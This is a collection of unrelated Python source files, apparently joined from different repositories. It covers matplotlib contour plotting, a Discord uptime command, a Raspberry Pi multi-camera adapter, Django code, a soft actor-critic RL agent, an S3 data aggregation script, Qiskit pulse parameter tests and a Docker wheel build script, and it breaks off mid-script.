""" # If there is a projection and specified X and Y data, plot filled contours and contour lines unless otherwise specified if (kwargs.get("projection") is not None): if (kwargs.get("X") is not None) and (kwargs.get("Y") is not None): # Create plot if self.contour_fill is not False: self.cf = self.ax.contourf(self.X.data, self.Y.data, self.data, levels=self.levels, cmap=self.cmap, transform=self.projection, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) if self.contour_lines is not False: self.cl = self.ax.contour(self.X.data, self.Y.data, self.data, levels=self.levels, colors=self.linecolor, alpha=0.8, linewidths=self.linewidth, linestyles=self.linestyle, transform=self.projection, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) # If there is a projection and no specified X and Y data, plot filled contours and contour lines unless otherwise specified else: # Create plot if self.contour_fill is not False: self.cf = self.ax.contourf(self.data, levels=self.levels, cmap=self.cmap, transform=self.projection, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) if self.contour_lines is not False: self.cl = self.ax.contour(self.data, levels=self.levels, colors=self.linecolor, alpha=0.8, linewidths=self.linewidth, linestyles=self.linestyle, transform=self.projection, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) # If there is not a specified projection and specified X and Y data, plot filled contours and contour lines unless otherwise specified else: if (kwargs.get("X") is not None) and (kwargs.get("Y") is not None): # Create plot if self.contour_fill is not False: self.cf = self.ax.contourf(self.X.data, self.Y.data, self.data, levels=self.levels, cmap=self.cmap, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) if self.contour_lines is not False: self.cl = self.ax.contour(self.X.data, self.Y.data, self.data, levels=self.levels, colors=self.linecolor, alpha=0.8, linewidths=self.linewidth, linestyles=self.linestyle, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) # If there is not a specified projection and no specified X and Y data, plot filled contours and contour lines unless otherwise specified else: # Create plot if self.contour_fill is not False: self.cf = self.ax.contourf(self.data, levels=self.levels, cmap=self.cmap, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) if self.contour_lines is not False: self.cl = self.ax.contour(self.data, levels=self.levels, colors=self.linecolor, alpha=0.8, linewidths=self.linewidth, linestyles=self.linestyle, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) def _add_contour_labels(self, ax, lines, contourlabels=None, background=True, fontsize=12): """Add contour line labels with an optional white background to the figure. Kwargs: contourbackground (:obj:`bool`): Whether a white background for the contour labels will be drawn. Default False. contourfontsize (:obj:`int`): Font size of the contour line labels. Default 12. contourlabels (:obj:`list` or :class:`numpy.ndarray`): List or array of labels to use for contour line labels. drawcontourlabels(:obj:`bool`): Whether add contour line labels to the figure. flevels (:obj:`list` or :class:`numpy.ndarray`): List or array of levels to be passed into matplotlib's contourf function. 
manualcontourlabels (:obj:`bool`): Whether contour line labels should be manually drawn. Default False. """ # Update argument definitions if self.contourfontsize is not None: fontsize = self.contourfontsize # If level range is less than 1, set labels with smaller differences between them if (self.levels[-1] - self.levels[0]) <= 1: fmt = '%0.2f' else: fmt = '%d' # Set contour line labels based on inputted arguments. Depending on which arguments are included or not, contour labels must be created differently. if self.contourlabels is None: ax.clabel(lines, fontsize=fontsize, fmt=fmt, inline=True, colors="black") elif self.manualcontourlabels is False: ax.clabel(lines, contourlabels, fontsize=fontsize, fmt=fmt, inline=True, colors="black") elif self.manualcontourlabels is True: ax.clabel(lines, fontsize=fontsize, fmt=fmt, inline=True, manual=contourlabels, colors="black") else: raise AttributeError( "Manualcontourlabels, if set, must be True or False.") # Add white background to contour line labels if background is True: [ txt.set_bbox(dict(facecolor='white', edgecolor='none', pad=2)) for txt in lines.labelTexts ] def _estimate_flevels(self): # TODO: flesh out print("estimate flevels") def _estimate_clevels(self): # TODO: flesh out print("estimate clevels") 1-10 import asyncio import discord import time from operator import itemgetter from discord.ext import commands from Cogs import ReadableTime # This is the Uptime module. It keeps track of how long the bot's been up class Uptime: # Init with the bot reference, and a reference to the settings var def __init__(self, bot): self.bot = bot self.startTime = int(time.time()) def message(self, message): # Check the message and see if we should allow it - always yes. # This module doesn't need to cancel messages. 
return { 'Ignore' : False, 'Delete' : False} @commands.command(pass_context=True) async def uptime(self, ctx): """Lists the bot's uptime.""" currentTime = int(time.time()) timeString = ReadableTime.getReadableTimeBetween(self.startTime, currentTime) msg = 'I\'ve been up for *{}*.'.format(timeString) await self.bot.send_message(ctx.message.channel, msg)import RPi.GPIO as gp import os import cv2 as cv import numpy as np import time class MultiAdapter: camNum = 4 adapter_info = { "A":{ "i2c_cmd":"i2cset -y 0 0x70 0x00 0x04", "gpio_sta":[0,0,1], }, "B":{ "i2c_cmd":"i2cset -y 0 0x70 0x00 0x05", "gpio_sta":[1,0,1], }, "C":{ "i2c_cmd":"i2cset -y 0 0x70 0x00 0x06", "gpio_sta":[0,1,0], }, "D":{ "i2c_cmd":"i2cset -y 0 0x70 0x00 0x07", "gpio_sta":[1,1,0], }, } camera = cv.VideoCapture(0) width = 320 height = 240 def __init__(self): gp.setwarnings(False) gp.setmode(gp.BOARD) gp.setup(7, gp.OUT) gp.setup(11,gp.OUT) gp.setup(12,gp.OUT) def choose_channel(self,index): channel_info = self.adapter_info.get(index) if channel_info == None: print("Can't get this info") os.system(channel_info["i2c_cmd"]) # i2c write gpio_sta = channel_info["gpio_sta"] # gpio write gp.output(7, gpio_sta[0]) gp.output(11, gpio_sta[1]) gp.output(12, gpio_sta[2]) def select_channel(self,index): channel_info = self.adapter_info.get(index) if channel_info == None: print("Can't get this info") gpio_sta = channel_info["gpio_sta"] # gpio write gp.output(7, gpio_sta[0]) gp.output(11, gpio_sta[1]) gp.output(12, gpio_sta[2]) def init(self,width,height): for i in range(self.camNum): self.height = height self.width = width self.choose_channel(chr(65+i)) self.camera.set(3, self.width) self.camera.set(4, self.height) ret, frame = self.camera.read() if ret == True: print("camera %s init OK" %(chr(65+i))) pname = "image_"+ chr(65+i)+".jpg" cv.imwrite(pname,frame) time.sleep(1) def preview(self): font = cv.FONT_HERSHEY_PLAIN fontScale = 1 fontColor = (255,255,255) lineType = 1 factor = 20 black = np.zeros(((self.height+factor)*2, self.width*2, 3), dtype= np.uint8) i = 0 while True: self.select_channel(chr(65+i)) ret, frame = self.camera.read() ret, frame = self.camera.read() ret, frame = self.camera.read() frame.dtype=np.uint8 if i == 0: black[factor:factor+self.height, 0:self.width, :] = frame bottomLeftCornerOfText = (factor,factor) index = chr(65+i) elif i == 1: black[factor:factor+self.height, self.width:self.width*2,:] = frame bottomLeftCornerOfText = (factor+self.width, factor) index = chr(65+i) elif i == 2: black[factor*2+self.height:factor*2+self.height*2, 0:self.width,:] = frame bottomLeftCornerOfText = (factor, factor*2+self.height) index = chr(65+i) elif i == 3: black[factor*2+self.height:factor*2+self.height*2, self.width:self.width*2,:] = frame bottomLeftCornerOfText = (factor+self.width, factor*2+self.height) index = chr(65+i) i = i+1 if i==self.camNum: i = 0 cv.putText(black,'CAM '+index, bottomLeftCornerOfText, font, fontScale,fontColor,lineType) cv.imshow("Arducam Multi Camera Demo",black) if cv.waitKey(1) & 0xFF == ord('q'): del frame self.camera.release() cv.destroyAllWindows() break from django.db.models import fields from django.db.models.base import Model from rest_framework import serializers from .models import Pattern class PatternSerializer(serializers.ModelSerializer): class Meta: model = Pattern fields = "__all__" 1-10 import torch import torch.nn as nn import torch.nn.functional as F from agents.ac_dgn import ActorCriticDGNAgent from agents.sdgn import soft_value_based_model_entropy_activation_function from 
utils.hparams import hparams from utils.numba_utils import * from utils.torch_utils import * soft_actor_critic_model_entropy_activation_function = soft_value_based_model_entropy_activation_function class SoftActorCriticDGNAgent(ActorCriticDGNAgent): def __init__(self, in_dim, act_dim): super(SoftActorCriticDGNAgent, self).__init__(in_dim, act_dim) self.alpha = torch.nn.Parameter(torch.tensor([0.1]), requires_grad=True) self.target_entropy = -np.log(1.0 / self.act_dim) * hparams['entropy_target_factor'] def cal_q_loss(self, sample, losses, log_vars=None, global_steps=None): obs = sample['obs'] adj = sample['adj'] action = sample['action'] reward = sample['reward'] next_obs = sample['next_obs'] next_adj = sample['next_adj'] done = sample['done'] batch_size, n_ant, _ = obs.shape # q_values : [b,n_agent,n_action] q_values = self.critic_learned_model(obs, adj) # target_q_values: [b,n_agent,] with torch.no_grad(): # Soft Value Function: V(s) = E_a[Q'(s',a')-log\pi(a'|s')] = \Sigma (\pi(a'|s') * Q'(s',a') - log\pi(a'|s')) next_probs, next_log_probs = self.actor_learned_model(next_obs, next_adj, return_log_pi=True) v_values, _ = self.critic_target_model(next_obs, next_adj) v_values = (next_probs * (v_values - self.alpha * next_log_probs)).sum(dim=-1) v_values = v_values.cpu().numpy() # [batch, n_agent] target_q_values = v_values numpy_q_values = q_values.detach().cpu().numpy() expected_q = numba_get_expected_q(numpy_q_values, action.cpu().numpy(), reward.cpu().numpy(), done.cpu().numpy(), hparams['gamma'], target_q_values, batch_size, n_ant) # q_loss: MSE calculated on the sampled action index! q_loss = (q_values - torch.tensor(expected_q).cuda()).pow(2).mean() losses['q_loss'] = q_loss def cal_p_loss(self, sample, losses, log_vars=None, global_steps=None): obs = sample['obs'] adj = sample['adj'] batch_size, n_ant, _ = obs.shape probs, log_probs = self.actor_learned_model(obs, adj, return_log_pi=True) log_probs = torch.log(probs + 1e-15) # [batch, agent, action] with torch.no_grad(): # q_values: Q(s,a), [b, n_agent, n_action] q_values = self.critic_learned_model(obs, adj) # baseline, V(s)=E_a[Q(s,a)]=\Sigma \pi(a|s)*Q(s,a) v_values = (probs * q_values).sum(dim=-1, keepdim=True) # advantage, A(s,a)=Q(s,a)-V(s) advantages = q_values - v_values # p_loss: \Sigma log\pi(a|s) * (A(s,a) - log\pi(a|s)) p_loss = -(log_probs * (advantages - self.alpha * log_probs)).mean() losses['p_loss'] = p_loss def cal_alpha_loss(self, sample, losses, log_vars=None, global_steps=None): obs = sample['obs'] adj = sample['adj'] with torch.no_grad(): probs, log_probs = self.actor_learned_model(obs, adj, return_log_pi=True) entropies = (-probs * log_probs).sum(dim=-1, keepdim=True) # [b,agent] if log_vars is not None: entropy = entropies.mean().item() log_vars['action_entropy'] = (global_steps, entropy) entropy_loss = (- soft_actor_critic_model_entropy_activation_function(self.alpha) * (self.target_entropy - entropies)).mean() losses['entropy_loss'] = entropy_loss def clip_alpha_grad(self, log_vars=None, global_steps=None): torch.nn.utils.clip_grad_norm_(self.alpha, max_norm=self.alpha.item()*0.01, norm_type=1) self.alpha.data = torch.max(self.alpha.data, torch.ones_like(self.alpha.data)*1e-5) if log_vars is not None: log_vars['alpha'] = (global_steps, self.alpha.item()) encyclopedia/views.py from django.shortcuts import render from . import util from . 
import converter def index(request): return converter.index(request) def new_entry(request, title): return converter.entry_page(request, title) def search(request): return converter.search(request) def create_new(request): return converter.create_new_page(request) def edit_page(request, title): return converter.edit(request, title) def random(request): return converter.rand_page(request)import os import re import pandas as pd from datetime import datetime, timedelta, date # compatibility with ipython #os.chdir(os.path.dirname(__file__)) import json import boto3 from pathlib import Path from coords_to_kreis import coords_convert import settings def aggregate(date): client_s3 = boto3.client("s3") s3 = boto3.resource('s3') content_object = s3.Object(settings.BUCKET, "aggdata/live/{}/{}/{}/zugdata.json".format(str(date.year).zfill(4), str(date.month).zfill(2), str(date.day).zfill(2))) file_content = content_object.get()['Body'].read().decode('utf-8') json_content = json.loads(file_content) df = pd.DataFrame(json_content) df["landkreis"] = coords_convert(df) print(df.shape) print(df["landkreis"].unique().shape) #df["district"] = coords_convert(df) #print(df.columns) df.drop(["lon", "lat", 'geometry', "name", "date"], inplace = True, axis = 1) df = df.set_index("landkreis") df = 1 - df df = df.reset_index() # aggregate by region # aggregate by region return df.to_dict() #pd.DataFrame(aggregate(date.today() - timedelta(days = 4))) wshanks/qiskit-terra # This code is part of Qiskit. # # (C) Copyright IBM 2017, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """Test cases for parameters used in Schedules.""" import unittest from copy import deepcopy import numpy as np from qiskit import pulse, assemble from qiskit.circuit import Parameter from qiskit.pulse import PulseError from qiskit.pulse.channels import DriveChannel, AcquireChannel, MemorySlot from qiskit.pulse.transforms import inline_subroutines from qiskit.test import QiskitTestCase from qiskit.test.mock import FakeAlmaden class TestPulseParameters(QiskitTestCase): """Tests usage of Parameters in qiskit.pulse; specifically in Schedules, Instructions, and Pulses. 
""" def setUp(self): """Just some useful, reusable Parameters and constants.""" super().setUp() self.alpha = Parameter('⍺') self.beta = Parameter('beta') self.gamma = Parameter('γ') self.phi = Parameter('ϕ') self.theta = Parameter('ϑ') self.amp = Parameter('amp') self.sigma = Parameter('sigma') self.qubit = Parameter('q') self.dur = Parameter('dur') self.freq = 4.5e9 self.shift = 0.2e9 self.phase = 3.1415 / 4 self.backend = FakeAlmaden() def test_parameter_attribute_channel(self): """Test the ``parameter`` attributes.""" chan = DriveChannel(self.qubit*self.alpha) self.assertTrue(chan.is_parameterized()) self.assertEqual(chan.parameters, {self.qubit, self.alpha}) chan = chan.assign(self.qubit, self.alpha) self.assertEqual(chan.parameters, {self.alpha}) chan = chan.assign(self.alpha, self.beta) self.assertEqual(chan.parameters, {self.beta}) chan = chan.assign(self.beta, 1) self.assertFalse(chan.is_parameterized()) def test_parameter_attribute_instruction(self): """Test the ``parameter`` attributes.""" inst = pulse.ShiftFrequency(self.alpha*self.qubit, DriveChannel(self.qubit)) self.assertTrue(inst.is_parameterized()) self.assertEqual(inst.parameters, {self.alpha, self.qubit}) inst.assign_parameters({self.alpha: self.qubit}) self.assertEqual(inst.parameters, {self.qubit}) inst.assign_parameters({self.qubit: 1}) self.assertFalse(inst.is_parameterized()) self.assertEqual(inst.parameters, set()) def test_parameter_attribute_play(self): """Test the ``parameter`` attributes.""" inst = pulse.Play(pulse.Gaussian(self.dur, self.amp, self.sigma), pulse.DriveChannel(self.qubit)) self.assertTrue(inst.is_parameterized()) self.assertSetEqual(inst.parameters, {self.dur, self.amp, self.sigma, self.qubit}) inst = pulse.Play(pulse.Gaussian(self.dur, 0.1, self.sigma), pulse.DriveChannel(self.qubit)) self.assertTrue(inst.is_parameterized()) self.assertSetEqual(inst.parameters, {self.dur, self.sigma, self.qubit}) def test_parameter_attribute_schedule(self): """Test the ``parameter`` attributes.""" schedule = pulse.Schedule() self.assertFalse(schedule.is_parameterized()) schedule += pulse.SetFrequency(self.alpha, DriveChannel(0)) self.assertEqual(schedule.parameters, {self.alpha}) schedule += pulse.ShiftFrequency(self.gamma, DriveChannel(0)) self.assertEqual(schedule.parameters, {self.alpha, self.gamma}) schedule += pulse.SetPhase(self.phi, DriveChannel(1)) self.assertTrue(schedule.is_parameterized()) self.assertEqual(schedule.parameters, {self.alpha, self.gamma, self.phi}) schedule.assign_parameters({self.phi: self.alpha, self.gamma: self.shift}) self.assertEqual(schedule.parameters, {self.alpha}) schedule.assign_parameters({self.alpha: self.beta}) self.assertEqual(schedule.parameters, {self.beta}) schedule.assign_parameters({self.beta: 10}) self.assertFalse(schedule.is_parameterized()) def test_straight_schedule_bind(self): """Nothing fancy, 1:1 mapping.""" schedule = pulse.Schedule() schedule += pulse.SetFrequency(self.alpha, DriveChannel(0)) schedule += pulse.ShiftFrequency(self.gamma, DriveChannel(0)) schedule += pulse.SetPhase(self.phi, DriveChannel(1)) schedule += pulse.ShiftPhase(self.theta, DriveChannel(1)) schedule.assign_parameters({self.alpha: self.freq, self.gamma: self.shift, self.phi: self.phase, self.theta: -self.phase}) insts = assemble(schedule, self.backend).experiments[0].instructions GHz = 1e9 # pylint: disable=invalid-name self.assertEqual(float(insts[0].frequency*GHz), self.freq) self.assertEqual(float(insts[1].frequency*GHz), self.shift) self.assertEqual(float(insts[2].phase), self.phase) 
self.assertEqual(float(insts[3].phase), -self.phase) def test_multiple_parameters(self): """Expressions of parameters with partial assignment.""" schedule = pulse.Schedule() schedule += pulse.SetFrequency(self.alpha + self.beta, DriveChannel(0)) schedule += pulse.ShiftFrequency(self.gamma + self.beta, DriveChannel(0)) schedule += pulse.SetPhase(self.phi, DriveChannel(1)) # Partial bind delta = 1e9 schedule.assign_parameters({self.alpha: self.freq - delta}) schedule.assign_parameters({self.beta: delta}) schedule.assign_parameters({self.gamma: self.shift - delta}) schedule.assign_parameters({self.phi: self.phase}) insts = schedule.instructions self.assertEqual(float(insts[0][1].frequency), self.freq) self.assertEqual(float(insts[1][1].frequency), self.shift) self.assertEqual(float(insts[2][1].phase), self.phase) def test_with_function(self): """Test ParameterExpressions formed trivially in a function.""" def get_frequency(variable): return 2*variable def get_shift(variable): return variable - 1 schedule = pulse.Schedule() schedule += pulse.SetFrequency(get_frequency(self.alpha), DriveChannel(0)) schedule += pulse.ShiftFrequency(get_shift(self.gamma), DriveChannel(0)) schedule.assign_parameters({self.alpha: self.freq / 2, self.gamma: self.shift + 1}) insts = schedule.instructions self.assertEqual(float(insts[0][1].frequency), self.freq) self.assertEqual(float(insts[1][1].frequency), self.shift) def test_substitution(self): """Test Parameter substitution (vs bind).""" schedule = pulse.Schedule() schedule += pulse.SetFrequency(self.alpha, DriveChannel(0)) schedule.assign_parameters({self.alpha: 2*self.beta}) self.assertEqual(schedule.instructions[0][1].frequency, 2*self.beta) schedule.assign_parameters({self.beta: self.freq / 2}) self.assertEqual(float(schedule.instructions[0][1].frequency), self.freq) def test_substitution_with_existing(self): """Test that substituting one parameter with an existing parameter works.""" schedule = pulse.Schedule() schedule += pulse.SetFrequency(self.alpha, DriveChannel(self.qubit)) schedule.assign_parameters({self.alpha: 1e9*self.qubit}) self.assertEqual(schedule.instructions[0][1].frequency, 1e9*self.qubit) schedule.assign_parameters({self.qubit: 2}) self.assertEqual(float(schedule.instructions[0][1].frequency), 2e9) def test_channels(self): """Test that channel indices can also be parameterized and assigned.""" schedule = pulse.Schedule() schedule += pulse.ShiftPhase(self.phase, DriveChannel(2*self.qubit)) schedule.assign_parameters({self.qubit: 4}) self.assertEqual(schedule.instructions[0][1].channel, DriveChannel(8)) def test_acquire_channels(self): """Test Acquire instruction with multiple channels parameterized.""" schedule = pulse.Schedule() schedule += pulse.Acquire(16000, AcquireChannel(self.qubit), MemorySlot(self.qubit)) schedule.assign_parameters({self.qubit: 1}) self.assertEqual(schedule.instructions[0][1].channel, AcquireChannel(1)) self.assertEqual(schedule.instructions[0][1].mem_slot, MemorySlot(1)) def test_overlapping_pulses(self): """Test that an error is still raised when overlapping instructions are assigned.""" schedule = pulse.Schedule() schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(self.qubit)) with self.assertRaises(PulseError): schedule |= pulse.Play(pulse.Waveform([0.5, 0.5, 0.5, 0.5]), DriveChannel(self.qubit)) def test_overlapping_on_assignment(self): """Test that assignment will catch against existing instructions.""" schedule = pulse.Schedule() schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), 
DriveChannel(1)) schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(self.qubit)) with self.assertRaises(PulseError): schedule.assign_parameters({self.qubit: 1}) def test_overlapping_on_expression_assigment_to_zero(self): """Test constant*zero expression conflict.""" schedule = pulse.Schedule() schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(self.qubit)) schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(2*self.qubit)) with self.assertRaises(PulseError): schedule.assign_parameters({self.qubit: 0}) def test_merging_upon_assignment(self): """Test that schedule can match instructions on a channel.""" schedule = pulse.Schedule() schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(1)) schedule = schedule.insert(4, pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(self.qubit))) schedule.assign_parameters({self.qubit: 1}) self.assertEqual(schedule.ch_duration(DriveChannel(1)), 8) self.assertEqual(schedule.channels, (DriveChannel(1),)) def test_overlapping_on_multiple_assignment(self): """Test that assigning one qubit then another raises error when overlapping.""" qubit2 = Parameter('q2') schedule = pulse.Schedule() schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(self.qubit)) schedule |= pulse.Play(pulse.Waveform([1, 1, 1, 1]), DriveChannel(qubit2)) schedule.assign_parameters({qubit2: 2}) with self.assertRaises(PulseError): schedule.assign_parameters({self.qubit: 2}) def test_play_with_parametricpulse(self): """Test Parametric Pulses with parameters determined by ParameterExpressions in the Play instruction.""" waveform = pulse.library.Gaussian(duration=128, sigma=self.sigma, amp=self.amp) schedule = pulse.Schedule() schedule += pulse.Play(waveform, DriveChannel(10)) schedule.assign_parameters({self.amp: 0.2, self.sigma: 4}) self.backend.configuration().parametric_pulses = ['gaussian', 'drag'] insts = schedule.instructions self.assertEqual(insts[0][1].pulse.amp, 0.2) self.assertEqual(insts[0][1].pulse.sigma, 4.) 
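    # Editorial sketch (not part of the original suite): the pattern the surrounding
    # tests exercise is "build a schedule with symbolic Parameters, then bind concrete
    # values with assign_parameters". A minimal illustration reusing the fixtures
    # defined in setUp; the method name is hypothetical.
    def test_bind_pattern_sketch(self):
        """Hypothetical example: a Gaussian play stays parameterized until bound."""
        schedule = pulse.Schedule()
        schedule += pulse.Play(pulse.Gaussian(160, self.amp, self.sigma),
                               DriveChannel(0))
        self.assertTrue(schedule.is_parameterized())
        # assign_parameters binds in place, after which no free Parameters remain
        schedule.assign_parameters({self.amp: 0.2, self.sigma: 40})
        self.assertFalse(schedule.is_parameterized())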
def test_parametric_pulses_parameter_assignment(self): """Test Parametric Pulses with parameters determined by ParameterExpressions.""" waveform = pulse.library.GaussianSquare(duration=1280, sigma=self.sigma, amp=self.amp, width=1000) waveform = waveform.assign_parameters({self.amp: 0.3, self.sigma: 12}) self.assertEqual(waveform.amp, 0.3) self.assertEqual(waveform.sigma, 12) waveform = pulse.library.Drag(duration=1280, sigma=self.sigma, amp=self.amp, beta=2) waveform = waveform.assign_parameters({self.sigma: 12.7}) self.assertEqual(waveform.amp, self.amp) self.assertEqual(waveform.sigma, 12.7) @unittest.skip("Not yet supported by ParameterExpression") def test_complex_value_assignment(self): """Test that complex values can be assigned to Parameters.""" waveform = pulse.library.Constant(duration=1280, amp=self.amp) waveform.assign_parameters({self.amp: 0.2j}) self.assertEqual(waveform.amp, 0.2j) def test_invalid_parametric_pulses(self): """Test that invalid parameters are still checked upon assignment.""" schedule = pulse.Schedule() waveform = pulse.library.Constant(duration=1280, amp=2*self.amp) schedule += pulse.Play(waveform, DriveChannel(0)) with self.assertRaises(PulseError): waveform.assign_parameters({self.amp: 0.6}) def test_get_parameter(self): """Test that get parameter by name.""" param1 = Parameter('amp') param2 = Parameter('amp') schedule = pulse.Schedule() waveform1 = pulse.library.Constant(duration=1280, amp=param1) waveform2 = pulse.library.Constant(duration=1280, amp=param2) schedule += pulse.Play(waveform1, DriveChannel(0)) schedule += pulse.Play(waveform2, DriveChannel(1)) self.assertEqual(len(schedule.get_parameters('amp')), 2) def test_reference_to_subroutine_params(self): """Test that get parameter objects from subroutines.""" param1 = Parameter('amp') waveform = pulse.library.Constant(duration=100, amp=param1) program_layer0 = pulse.Schedule() program_layer0 += pulse.Play(waveform, DriveChannel(0)) # from call instruction program_layer1 = pulse.Schedule() program_layer1 += pulse.instructions.Call(program_layer0) self.assertEqual(program_layer1.get_parameters('amp')[0], param1) # from nested call instruction program_layer2 = pulse.Schedule() program_layer2 += pulse.instructions.Call(program_layer1) self.assertEqual(program_layer2.get_parameters('amp')[0], param1) def test_assign_parameter_to_subroutine(self): """Test that assign parameter objects to subroutines.""" param1 = Parameter('amp') waveform = pulse.library.Constant(duration=100, amp=param1) program_layer0 = pulse.Schedule() program_layer0 += pulse.Play(waveform, DriveChannel(0)) reference = deepcopy(program_layer0).assign_parameters({param1: 0.1}) # to call instruction program_layer1 = pulse.Schedule() program_layer1 += pulse.instructions.Call(program_layer0) target = deepcopy(program_layer1).assign_parameters({param1: 0.1}) self.assertEqual(inline_subroutines(target), reference) # to nested call instruction program_layer2 = pulse.Schedule() program_layer2 += pulse.instructions.Call(program_layer1) target = deepcopy(program_layer2).assign_parameters({param1: 0.1}) self.assertEqual(inline_subroutines(target), reference) def test_assign_parameter_to_subroutine_parameter(self): """Test that assign parameter objects to parameter of subroutine.""" param1 = Parameter('amp') waveform = pulse.library.Constant(duration=100, amp=param1) param_sub1 = Parameter('amp') param_sub2 = Parameter('phase') subroutine = pulse.Schedule() subroutine += pulse.Play(waveform, DriveChannel(0)) reference = 
deepcopy(subroutine).assign_parameters({param1: 0.1 * np.exp(1j * 0.5)}) main_prog = pulse.Schedule() pdict = {param1: param_sub1 * np.exp(1j * param_sub2)} main_prog += pulse.instructions.Call(subroutine, value_dict=pdict) # parameter is overwritten by parameters self.assertEqual(len(main_prog.parameters), 2) target = deepcopy(main_prog).assign_parameters({param_sub1: 0.1, param_sub2: 0.5}) self.assertEqual(inline_subroutines(target), reference) class TestParameterDuration(QiskitTestCase): """Tests parametrization of instruction duration.""" def test_pulse_duration(self): """Test parametrization of pulse duration.""" dur = Parameter('dur') test_pulse = pulse.Gaussian(dur, 0.1, dur/4) ref_pulse = pulse.Gaussian(160, 0.1, 40) self.assertEqual(test_pulse.assign_parameters({dur: 160}), ref_pulse) def test_play_duration(self): """Test parametrization of play instruction duration.""" dur = Parameter('dur') ch = pulse.DriveChannel(0) test_play = pulse.Play(pulse.Gaussian(dur, 0.1, dur/4), ch) test_play.assign_parameters({dur: 160}) self.assertEqual(test_play.duration, 160) def test_delay_duration(self): """Test parametrization of delay duration.""" dur = Parameter('dur') ch = pulse.DriveChannel(0) test_delay = pulse.Delay(dur, ch) test_delay.assign_parameters({dur: 300}) self.assertEqual(test_delay.duration, 300) def test_acquire_duration(self): """Test parametrization of acquire duration.""" dur = Parameter('dur') ch = pulse.AcquireChannel(0) mem_slot = pulse.MemorySlot(0) test_acquire = pulse.Acquire(dur, ch, mem_slot=mem_slot) test_acquire.assign_parameters({dur: 300}) self.assertEqual(test_acquire.duration, 300) def test_is_parameterized(self): """Test is parameterized method for parameter duration.""" dur = Parameter('dur') ch = pulse.DriveChannel(0) test_play = pulse.Play(pulse.Gaussian(dur, 0.1, dur/4), ch) self.assertEqual(test_play.is_parameterized(), True) def test_cannot_build_schedule(self): """Test we cannot build schedule with parameterized instructions""" dur = Parameter('dur') ch = pulse.DriveChannel(0) test_play = pulse.Play(pulse.Gaussian(dur, 0.1, dur/4), ch) sched = pulse.Schedule() with self.assertRaises(pulse.exceptions.UnassignedDurationError): sched.insert(0, test_play) docker/build_wheels.py import os import subprocess CYTHON_VERSION = '0.27.3' CUPY_VERSION = '4.0.0' PYNVVL_VERSION = '0.0.2a3' WHEEL_CONFIGS = { '8.0': { 'lib': 'docker/lib/cuda-8.0', 'tag': 'mitmul/pynvvl:cuda-8.0-wheels', 'test': 'mitmul/pynvvl:cuda-8.0-test', }, '9.0': { 'lib': 'docker/lib/cuda-9.0', 'tag': 'mitmul/pynvvl:cuda-9.0-wheels', 'test': 'mitmul/pynvvl:cuda-9.0-test', }, '9.1': { 'lib': 'docker/lib/cuda-9.1', 'tag': 'mitmul/pynvvl:cuda-9.1-wheels', 'test': 'mitmul/pynvvl:cuda-9.1-test', }, } PYTHON_VERSIONS = { '2.7.6': { 'python_tag': 'cp27', 'linux_abi_tag': 'cp27mu', }, '3.4.7': { 'python_tag': 'cp34', 'linux_abi_tag': 'cp34m', }, '3.5.1': { 'python_tag': 'cp35', 'linux_abi_tag': 'cp35m', }, '3.6.0': { 'python_tag': 'cp36', 'linux_abi_tag': 'cp36m', }, } def build_docker_image(cuda_version, tag, test): python_versions = ' '.join(PYTHON_VERSIONS.keys()) cudda_version_no_dot = cuda_version.replace('.', '') subprocess.call([ 'docker', 'build', '--build-arg', 'cuda_version={}'.format(cuda_version), '--build-arg', 'python_versions={}'.format(python_versions), '--build-arg', 'cython_version={}'.format(CYTHON_VERSION), '--build-arg', 'cupy_version={}'.format(CUPY_VERSION), '--build-arg', 'cupy_package_name=cupy-cuda{}'.format( cudda_version_no_dot), '-t', tag, '-f', 'docker/Dockerfile.wheels', 
'docker' ]) subprocess.call([ 'docker', 'build', '--build-arg', 'cuda_version={}'.format(cuda_version), '--build-arg', 'python_versions={}'.format(python_versions), '--build-arg', 'cython_version={}'.format(CYTHON_VERSION), '--build-arg', 'cupy_version={}'.format(CUPY_VERSION), '--build-arg', 'pynvvl_version={}'.format(PYNVVL_VERSION), '--build-arg', 'cupy_package_name=cupy-cuda{}'.format( cudda_version_no_dot), '-t', test, '-f', 'docker/Dockerfile.test', 'docker' ]) def build_wheels(cuda_version): for python_version in PYTHON_VERSIONS.keys(): print('-' * 10, 'Building for Python {}'.format(python_version), '-' * 10) subprocess.call( 'nvidia-docker run' ' --rm' ' -v {source_dir}:/pynvvl' ' -t {tag}' ' bash -c' ' " \ find / -name \"*libnvcuvid.so.1\" | \ xargs -IXXX ln -s XXX /usr/local/lib/libnvcuvid.so && \ pyenv global {python_version} && pyenv rehash && \ cd /pynvvl && python setup.py bdist_wheel \ -d dist/cuda-{cuda_version} \ --package-name {package_name} \ "'.format( source_dir=os.getcwd(), tag=WHEEL_CONFIGS[cuda_version]['tag'], python_version=python_version, cuda_version=cuda_version, package_name='pynvvl_cuda{}'.format( cuda_version.replace('.', '')), ), shell=True) subprocess.call( 'nvidia-docker run' ' --rm' ' -v {source_dir}:/pynvvl' ' -t {tag}' ' bash -c' ' " \ for file in 